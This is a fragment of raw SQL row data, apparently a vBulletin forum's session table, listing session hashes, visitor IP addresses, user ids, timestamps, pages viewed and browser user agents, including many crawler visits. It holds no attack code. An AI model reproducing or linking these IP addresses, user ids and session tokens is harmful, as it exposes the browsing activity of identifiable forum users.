('0d159c8f62acbfb0dd74cf142fd62d5b', 0, '108.202.103.86', '2d95df4abb9191ef3088bd67255f881a', 1465270656, '/showthread.php?p=2265', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('567c7175dbf9be774d127ed044ecf52a', 0, '46.246.121.243', '4c3677a5bb49943865ac27bce11a7c60', 1465270501, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('136f8c50c12c5dbdf5506eb2a1979c0b', 0, '120.169.254.205', '7bbe156f432df582cccf67e964070ddc', 1465270096, '/search.php?do=getnew', 'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; ASUS_T00I Build/KVT49L) AppleWebKit/534.30 (KHTML, like', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('46c19115b38cad117d09c717b346dd3c', 0, '66.249.65.58', '2b2ff7461e581eb89ef4dc9afe8de380', 1467559892, '/index.php?langid=2', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('898d2e6c63ef1b2519e16afe5c77f6c6', 0, '108.23.220.189', 'b868811fb1dcfc41300645207f70c947', 1465263553, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7f57e0e5adc6074ea887f4932d9e2115', 0, '179.35.22.95', 'd8a7c6783f8154e185cad9d8aafbdd86', 1465263449, '/showthread.php?p=3005', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('46e7b873afbcfda90df2b3f00c544a28', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465262273, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('99312212f6d307b0e5b57b45449cee88', 0, '51.255.169.5', '6e37b09dd9a32a8e674c88b3a2a0046e', 1467663580, '/index.php', 'Mozilla/5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6f2bb4b8f3dad9c75b079abc87d8defd', 135, '160.160.242.194', 'db491ce9daa2b4deb08dc3cadeca4502', 1465234910, '/usercp.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('3c419bd8830c9dcbc38dd6f01114da57', 0, '66.249.65.58', '0ff4417ffc4aa97369fda8263e0a4dca', 1467503279, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3f4569b9890ff43518f5194cc2e68979', 0, '100.43.81.149', 'b40eb992e4ed4c9574976a2678dedecd', 1472896179, '/index.php', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0070e9cb530c3e6dd2eba8f56f343220', 0, '109.108.88.94', '148aa9cb3229b078b77ce43f1639ed4d', 1465234439, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ff850a1125919387f2eea078420105a1', 0, '179.43.176.98', 'a90b008e66d3c751611b020778def9de', 1465234200, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2ac3e51f8d3464b74f82f72746ed375c', 0, '104.132.1.77', '0cb1ad88ba1661699af12d74caa9b726', 1465249898, '/memberlist.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cfd56b969d0d148794e0567cdd5b6c77', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465248816, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5ed01394057262650fba8bdbe5b10724', 0, '178.24.168.101', '43b38a52a8e2d7f1e45051bf02041d8c', 1465247318, '/index.php?', 'Mozilla/5.0 (Windows NT 5.2; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('73aa4e5168e5dd9b65acec335b641f24', 0, '24.180.73.130', '21542fce446b4042ec3ded5d90d63a23', 1465249842, '/search.php?do=getnew', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4743c730d83b908ca8455e905288d47e', 0, '2600:1017:b81f:', '2219e45d9ee3f9eb1ba95f7fa62ce777', 1465233808, '/register.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d1f9b9c64e6d0b6cf67520d3f2283ea7', 0, '172.68.11.238', '52a48f5426da4ef3b7e7d8fb4412286d', 1465233669, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3d5c1070abdff45f814eead6ec2a91f5', 0, '192.249.66.138', 'e45ef3fa269d331b08260291f67a8342', 1465229450, '/register.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.21', 0, 0, 0, 0, 0, 0, 3, 0, 0),
('5aed77c8f7b2a0582c577c4d407b85a7', 0, '66.249.65.61', '0ff4417ffc4aa97369fda8263e0a4dca', 1467526385, '/showthread.php?t=2505', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a2899686443e03a98faa9fa1f65b2ac2', 0, '2600:1006:b11d:', '553123e557b0c95b96ca4008949f4a26', 1465234708, '/search.php?do=getdaily', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mob', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('655573b09bcc62a11488bae9e5531889', 0, '77.113.16.46', '3cafc90d7fb9aaf6ee45f03414b0aebd', 1465245460, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('442a5858c16af9e278e720ffd633cdde', 0, '207.46.13.134', '5e207e311e22cdc3b2095126a922fa93', 1465244937, '/misc.php?do=showsmilies', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e060226c79a725b3bbc8a9dfdaa6382b', 0, '2601:342:101:66', '45e37a3f7dac23c6ac430f92626bf59d', 1465306421, '/forumdisplay.php?f=37', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f850422e8c196452966124745859c7cb', 0, '66.249.65.97', '0ff4417ffc4aa97369fda8263e0a4dca', 1467487180, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('197a420ad91bfa1195cf83b3b37e582e', 0, '176.58.205.39', 'e2a132b5d4fd0d184c1e140b5b024bac', 1465244375, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b7746ab7cc5849b502972f9517a93aaf', 0, '66.249.65.100', '0ff4417ffc4aa97369fda8263e0a4dca', 1467525825, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a2fde1456f8444d1206c6b5f80df11a5', 0, '90.62.251.83', 'feb503786d57dc15615e0f0a18e9a133', 1465230314, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safar', 0, 0, 0, 37, 0, 0, 0, 0, 0),
('d27dce5ccfe4d9849f28c01fcdbc6f19', 0, '118.8.25.16', 'ffe3fba34a83098e783b368ae0f0ad8e', 1475217635, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d02be4786b6a1a6db0bf74148dbff90e', 0, '66.249.65.103', '0ff4417ffc4aa97369fda8263e0a4dca', 1467487179, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('d3096bc27f54beafe946359388934f33', 0, '80.5.217.86', 'ac697279bdb752178074a90f47feca3c', 1465243810, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4136b2aafbeac3a51acd6a804472700e', 0, '66.249.65.55', '0ff4417ffc4aa97369fda8263e0a4dca', 1474998887, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eef690eedc4a93a7a1a8086057359bc1', 0, '109.160.55.45', 'ae98e75e7315bec4637a6405c4c60ae1', 1465242080, '/member.php?u=388', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3570a2daa8c29e8dd497da3c023001e9', 0, '199.16.156.125', '5e43b6ef09efff55d94de9034ff2481e', 1475355496, '/showthread.php?p=2784', 'Twitterbot/1.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fab00b41b919f4f2e75eccb1e9a24a95', 0, '199.16.156.124', '5e43b6ef09efff55d94de9034ff2481e', 1475355496, '/showthread.php?t=2314', 'Twitterbot/1.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7d8708fa921dfb37dfa640c8be5f109f', 0, '199.16.156.126', '5e43b6ef09efff55d94de9034ff2481e', 1475348822, '/showthread.php?p=2890', 'Twitterbot/1.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f32e70449ddeffae351928d2822544b2', 0, '75.67.147.134', '3b37f1393cb5b4bfade296977b2bec62', 1465240785, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cb1e3e9bd3fc34b15e8f5f7f0e4c8adc', 0, '95.215.62.20', '96a92684727c3ed493a947448d5194aa', 1465240631, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b8cfba83a933e39b465bbd313a488565', 0, '178.62.71.57', '93523878044af4c1dfa3903d05615eef', 1465833988, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ea7890ff507a681e986e93f0df7553a5', 0, '83.143.240.38', '9b9591fd62379a0cb6b9013f9e976b5b', 1465239616, '/register.php?', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5e08cd5cbe76f25a7ac4b54417f880ef', 0, '68.180.228.122', '9d8a8ad3406087c14548478984f3ed76', 1468864833, '/misc.php?do=whoposted&t=1856', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('43ed6bc90668f8563ed83f2ddb5a6ce1', 0, '88.118.210.80', 'e81f60a675de1b52988f8282fadbf752', 1465239545, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('60b53953a7616f84d906d69f7caa5f4a', 0, '52.90.128.17', '2f81c490e4cd892f796781e0d9e2589e', 1465233311, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0', 0, 0, 0, 37, 2505, 0, 0, 0, 0),
('0aaa3a3f8f43f04f8775337b686cff62', 0, '176.126.252.11', '8a4ffb51d96fe951863efb4b955195af', 1465230293, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 3, 0, 0),
('a40baa2cc32e25a0e3bd6b58d1727249', 0, '172.68.11.249', '3600f04ecaf760a00bb8927e44d306d7', 1465229667, '/showthread.php?t=2239', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safar', 0, 0, 0, 32, 2239, 0, 0, 0, 0),
('88e44579d9a0bcc51710e4e88f0778fc', 0, '212.3.50.63', '4b15870ba6248a70921be5dae170e25a', 1465231488, '/showthread.php?t=1145', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.3', 0, 0, 0, 37, 1145, 0, 0, 0, 0),
('a430725f9e6c1e1b9a916f1178cad726', 0, '66.249.75.33', '8c2a58ed4130be298d50116da95b8cf5', 1465329425, '/showthread.php?p=2880&nojs=1', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7dacf525b4a79fdb99afaa7fdc5d6e11', 0, '66.249.75.41', '37a60411c341250cf0113f4eba911963', 1470330962, '/archive/index.php/t-2462.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('9bdee4ef9db6581ca18182a1ecbe571f', 0, '66.249.75.33', '37a60411c341250cf0113f4eba911963', 1470340866, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('78d4f0375bc8750463007b17a84b1027', 0, '66.249.75.25', '37a60411c341250cf0113f4eba911963', 1470340867, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('2f47ba560dedb9d072a8f788dd887482', 0, '2607:f140:2000:', '67644424d518bca4007ae927c531493b', 1465333807, '/forumdisplay.php?f=31', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ba5c63bb8732128857bb5b246e046108', 0, '2a02:587:3112:a', '122127a4185f18b3731b52a6b2592f39', 1465335612, '/register.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3c70c6b0b7267c7dfd31001d21aca705', 0, '180.180.68.54', 'b7d647afdfe0db585f510ec032a4b64c', 1465335871, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('60a7fc8174d9614c262c1546aacdd7ed', 0, '217.69.133.223', 'adec92f43af45575d1a28ddcb0eea331', 1465337104, '/showthread.php?p=3017', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f650ee160a3a5c0464357997853c9d2e', 0, '172.68.10.200', '8b7c6b780b785d5501789dec2a0bd31d', 1465337483, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('45c717f203b24a351922b7bcbd4731f2', 0, '109.231.22.16', '70df9c7229cd3c099fedf2f7d88d42c3', 1465337575, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f98c22d4fa5952156abe99e3e49bbb35', 0, '176.10.104.240', '6f1d7d2a3606ab5c0948dc816416ea73', 1465339118, '/showthread.php?t=1030', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b6aae427c60c5a00105b73c94afdbead', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465339507, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('56263044a58853df2601f28004f60923', 0, '2a02:c7f:b406:f', 'b4db3971561a691fae8d16b5cdd66373', 1465340137, '/forumdisplay.php?f=31', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('26c74d709261fe399c4c2ae6b1ed7419', 0, '77.124.93.147', '633f0bccf968bc65cb3e069b7b4410cf', 1465341836, '/index.php', 'SimonWebHelper/1.0 CFNetwork/760.5.1 Darwin/15.5.0 (x86_64)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('29a5e1ab2a5d083256ac95e5780acc96', 0, '66.249.69.248', 'a938925ca9403f145c82d10ebc1ecbe1', 1465342657, '/misc.php?do=bbcode&langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('99bee2bd34f9ff8ee6a737c5d3ea5e35', 0, '185.24.34.7', 'ca6a625784ac42a79f20214bfb33fc34', 1465342735, '/showthread.php?p=3045', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mob', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6513254434fb50cc2d2a1f97fc597c2a', 0, '91.109.201.7', 'ffe9e10975ca840e450dae58e236b4f0', 1465342898, '/showthread.php?t=2505', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7a318ad22fa91fd19397a08faa903d71', 0, '66.249.69.160', 'a938925ca9403f145c82d10ebc1ecbe1', 1465888013, '/faq.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dff9fe514db956201a552e745411d5e8', 0, '66.249.69.166', 'a938925ca9403f145c82d10ebc1ecbe1', 1468239442, '/faq.php?faq=vb3_board_usage&langid=1', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 1, 0, 0, 0, 0, 2, 0, 0),
('dc6bab8875e09611d798ecd9c0d5bac7', 0, '172.68.11.245', 'ffe9e10975ca840e450dae58e236b4f0', 1465343650, '/search.php?do=process&do=process', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1fed6e872261a426778853d7bb22943d', 0, '68.115.102.55', '9ed55da2539aeac6c58b6436be7d3833', 1465343977, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ba68dc3c3eb5042235714077d2d889ab', 0, '66.249.69.178', 'a938925ca9403f145c82d10ebc1ecbe1', 1465887634, '/forumdisplay.php?f=31', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4a53bc7f6cac743e535d563a76538c0b', 0, '66.249.69.183', 'a938925ca9403f145c82d10ebc1ecbe1', 1465887450, '/forumdisplay.php?f=32', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('19d097a8607deb5537ec312a7886d62a', 0, '66.249.69.173', 'a938925ca9403f145c82d10ebc1ecbe1', 1468240732, '/member.php?u=217', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0e4940f03b99ebdf02e531797230e1e9', 0, '2601:405:4001:7', 'cba144fea957a316a28b3d488ea70801', 1465348353, '/faq.php', 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de2ac55bd2ba1acc2175844d3883fd42', 0, '172.68.29.120', 'b56020228bb7b17213cf3b12ecb4dbdd', 1465349298, '/announcement.php?f=37', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('25019dd5fb2d9a355bfbef3b8f6a2cc5', 0, '38.106.53.186', '6bc3b024156d696427ee0a8a8ff871c7', 1465351279, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c101aab5319be2888662688610da4fad', 0, '107.77.215.175', 'd2e85876781d04545e80bacd72920539', 1465352495, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9c0c70791e995587d5047cf8d8e99373', 0, '190.191.137.215', '8423cb845895d5395b94333f16296a74', 1465451937, '/showthread.php?p=3046', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2a289b09f1f6f32fd06826b5c0aa0e26', 0, '182.251.52.212', '44f828ff945f536358cbe38f6163c737', 1465354708, '/forumdisplay.php?f=31', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('00bc23ffba56b8a2982c6d372dc2aefc', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465356938, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('6e45d9e761467ef5d9b2d1df49532dac', 0, '2605:e000:141b:', 'dfd21eee20e331d5d9afc3072253a580', 1465620473, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d8175f64ad8b40e5f078ea6e6ca7a869', 0, '202.142.91.96', '492c3de93d0cbe324a7b61dd874796ee', 1465362483, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bcc2224cf8d8e836b467aba39f091921', 0, '31.135.95.215', '556c704bc133fe7e8cf19b97cd776347', 1465363478, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1adbdca17d5b099dbdc045fc460b3d77', 0, '117.99.176.0', '6c3b2111e574673e05d3652a32c0d63e', 1465364196, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be1649008a567a4029e877533713c3d5', 0, '217.69.133.224', 'adec92f43af45575d1a28ddcb0eea331', 1465365962, '/online.php', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ce3bd7bbc073fd67db39ad27cfb31a84', 0, '86.178.80.128', '645edfa0ac00bf44bffa6fa08c0adee5', 1465366072, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e1a5a7775ef7b40b6c6722630bf143ca', 161, '54.233.145.152', '9a23805a733ff0e56cb591cfab7efb9f', 1465371742, '/search.php?do=getnew', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('7ab7cdf7bdbd776576381a2dc6534eda', 0, '182.92.253.1', 'f317c84e3831ccd3be15fa7391fe420c', 1465371989, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aae917652a4f6550979dbbcf3d953f36', 0, '104.238.158.152', 'd57ab525378f9b2690cb51ea9a193a61', 1465373840, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('27337211bab80ebf04687c419cd3375a', 161, '172.68.29.181', '9a23805a733ff0e56cb591cfab7efb9f', 1465374133, '/search.php?do=getnew', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('31de57c2e5accfcf081f2f928e315554', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465374833, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('101a81c125e060f6c59765b5bf97f022', 0, '217.73.42.10', 'ce4bfecdf07d0e1967a38799264a0ccd', 1465376617, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f561f92c1e168f098781fc30ff6086fb', 0, '194.28.51.187', 'dd9799d0a4a220b1ac7ecfbdac75a34a', 1467248538, '/member.php?u=29', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8ee4f3f533dcb6c452dcc7741edd8ad5', 0, '199.21.99.202', '5b0cb54f421881da85b8db222ee9f3cd', 1475319014, '/showthread.php?t=2239', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1903ddd07a82ec6e0f0afa26a84652d0', 0, '109.235.42.45', '10c462a5253632b8cd2189e485a62446', 1465383362, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
